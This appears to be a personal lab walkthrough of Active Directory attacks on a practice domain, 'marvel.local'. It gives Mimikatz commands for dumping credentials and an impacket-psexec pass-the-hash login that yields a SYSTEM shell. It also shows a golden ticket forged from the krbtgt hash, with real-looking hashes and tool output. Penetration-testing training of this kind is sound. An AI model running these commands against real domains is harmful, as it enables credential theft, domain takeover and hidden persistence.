Golden Ticket Attacks
PRACTICE ! PRACTICE ! PRACTICE !
What is Mimikatz
A Post Exploitation tool used to view and steal credentials - generate kerberos tickets and leverage attacks
Dumps credentials stored inside the memory, Possible attacks w Mimikatz
Credential Dumping
Pass-The-Hash
Over-Pass-The-Hash
Pass-The-Ticket
Golden Ticket
Silver Ticket
Credential Dumping using Mimikatz
mimikatz# privilege::debug // Bypass certain restrictions
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::sam
mimikatz# lsadump::sam /patch
mimikatz# lsadump::lsa /patch

Administrator's NTLM hash - 8d657f0e83858757657fc60dbf57c15d
We can now psexec into the DC using the NTLM hash, But wait psexec requires NThash and LMhash separately right ? - Idk if i'm correct but I just repeated the same NTLM hash for both and it worked :)
$ impacket-psexec marvel.local/administrator@192.168.169.147 -hashes 8d657f0e83858757657fc60dbf57c15d:8d657f0e83858757657fc60dbf57c15d
Impacket v0.10.1.dev1+20230511.22548.197c14bd - Copyright 2022 Fortra
[*] Requesting shares on 192.168.169.147.....
[*] Found writable share ADMIN$
[*] Uploading file QcqliVUn.exe
[*] Opening SVCManager on 192.168.169.147.....
[*] Creating service xkdY on 192.168.169.147.....
[*] Starting service xkdY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> echo %username%
HYDRA-DC$
Golden Ticket Attacks
This attack is mainly used for Persistance, a simple explanation would be us impersonating the default Kerberos TGT account ( krbtgt ) and generating golden tickets for the sake of Stealth :)
mimikatz# privilege::debug
mimikatz# lsadump::lsa /inject /name:krbtgt

Important things to note down
The SID =>
S-1-5-21-3353711819-682220578-791151302
NTLM Hash of the user krbtgt =>
92c380ff77ec1e13f38a9ed5609ff591
Now let's generate some golden tickets by abusing the krbtgt account :)
mimikatz# kerberos::golden /User:fakeuser /domain:marvel.local /sid:S-1-5-21-3353711819-682220578-791151302 /krbtgt:92c380ff77ec1e13f38a9ed5609ff591 /id:500 /ptt
User : fakeuser
Domain : marvel.local (MARVEL)
SID : S-1-5-21-3353711819-682220578-791151302
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 92c380ff77ec1e13f38a9ed5609ff591 - rc4_hmac_nt
Lifetime : 5/11/2023 5:08:54 AM ; 5/8/2033 5:08:54 AM ; 5/8/2033 5:08:54 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'fakeuser @ marvel.local' successfully submitted for current session
mimikatz# misc::cmd
Patch OK for 'cmd.exe'
Now we can open a cmd via mimikatz and execute psexe.exe file to move laterally or pivot in the network !
Last updated